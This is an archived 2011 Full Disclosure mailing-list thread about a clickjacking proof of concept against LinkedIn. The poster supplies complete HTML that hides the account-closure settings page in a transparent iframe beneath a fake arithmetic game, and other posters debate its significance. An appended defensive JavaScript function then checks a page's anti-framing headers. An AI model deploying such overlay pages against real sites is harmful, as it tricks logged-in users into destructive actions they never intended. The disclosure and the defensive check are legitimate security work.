Full Disclosure mailing list archives

Re: LinkedIn_User Account Delete using Click jacking


From: xD 0x41 <secn3t () gmail com>
Date: Mon, 10 Oct 2011 09:36:17 +1100

 seems that you aren't familiar what Clickjacking means then...

No,... and am happy not to know :-) , like XSS, I do not waste time with
minority bugs such as 'clickjacking' and these new such terms which are
total BS.
anyhow... call it what you like, it is bs (just like the win32 dll crap and
simple-xss CRAP!)
xd



On 10 October 2011 04:53, Ferenc Kovacs <tyra3l () gmail com> wrote:

it seems that you aren't familiar what Clickjacking means then...

On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 <secn3t () gmail com> wrote:
That's just lame dude.... if you could remove OTHER people's accounts, then I'd
say *clap clap*... but own account... what about just clicking "close
account", and let's skip creating a html page, for this... :) cheers


On 8 October 2011 17:06, asish agarwalla <asishagarwalla () gmail com>
wrote:

Be logged into LinkedIn, in Firefox
Create an HTML page using the below code
Open the created HTML page in a new Firefox tab
Play the simple game

<html>
<head>
<style>
button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
#Div3{
opacity: 0;
position: absolute;
top: 25px;
left: 160px;
}
#Div2{
opacity: 1;
position: absolute;
top: 65px;
left: 340px;
}
#Div1 {
opacity: 1;
position: absolute;
top: 65px;
left: 195px;
}
#victim2 {
opacity: 1;
position: absolute;
top: 65px;
left: 50px;
}
#victim {
opacity: 0.4;
position: absolute;
top: -226px;
left: -35px;
width:800px;
height: 800px;
}
</style>
</head>
<body>
<div>
<h1>Please Click Twice on the Right Options And Then Click Submit</h1>
</div>
<div id=Div3>
<h1>55+27=?</h1>
</div>
<div id=victim2>
<h1>55 </h1>
</div>
<div id=Div1>
<h1>82</h1>
</div>
<div id=Div2>
<h1>95</h1>
</div>
<button type="button" class="dummy3">Submit</button>
<div id=victim>
<iframe src="https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1"
border=0 scrolling=no width=650 height=1100></iframe>
</div>
</body>
</html>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/






--
Ferenc Kovács
@Tyr43l - http://tyrael.hu
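
The proof of concept quoted in this thread only works if the account settings page can be rendered inside a frame on another origin. The following is an added example, not part of the thread and not LinkedIn's code: a check that classifies a response's anti-framing headers, with function names chosen here for illustration.

```javascript
// Added example (not from the thread). Classifies how a response may be framed
// by a page on ANOTHER origin: 'blocked', 'allowlist' or 'open'.
function frameAncestors(csp) {
  // Source list of the frame-ancestors directive, or null when absent.
  for (const directive of csp.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

function crossOriginFraming(headers) {
  // headers: array of [name, value] pairs so repeated headers survive.
  const values = (n) =>
    headers.filter(([k]) => k.toLowerCase() === n).map(([, v]) => v);

  const lists = values('content-security-policy')
    .map(frameAncestors)
    .filter((list) => list !== null);
  if (lists.length > 0) {
    // frame-ancestors overrides X-Frame-Options; every policy must pass,
    // so the strictest list decides.
    const selfOnly = (l) => l.every((s) => /^'(none|self)'$/i.test(s));
    const wild = (l) => l.some((s) => s === '*' || /^[a-z][a-z0-9+.-]*:$/i.test(s));
    if (lists.some(selfOnly)) return 'blocked'; // empty list behaves as 'none'
    return lists.every(wild) ? 'open' : 'allowlist';
  }

  // Legacy header: DENY and SAMEORIGIN both stop cross-origin framing.
  // ALLOW-FROM is obsolete and ignored by current browsers, so it protects nothing.
  const xfo = values('x-frame-options')
    .flatMap((v) => v.split(','))
    .map((v) => v.trim().toLowerCase());
  return xfo.some((v) => v === 'deny' || v === 'sameorigin') ? 'blocked' : 'open';
}
```

A result of 'open' on a page that performs a state-changing action, such as closing an account, is the condition to fix by sending `frame-ancestors 'none'` or `'self'`.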
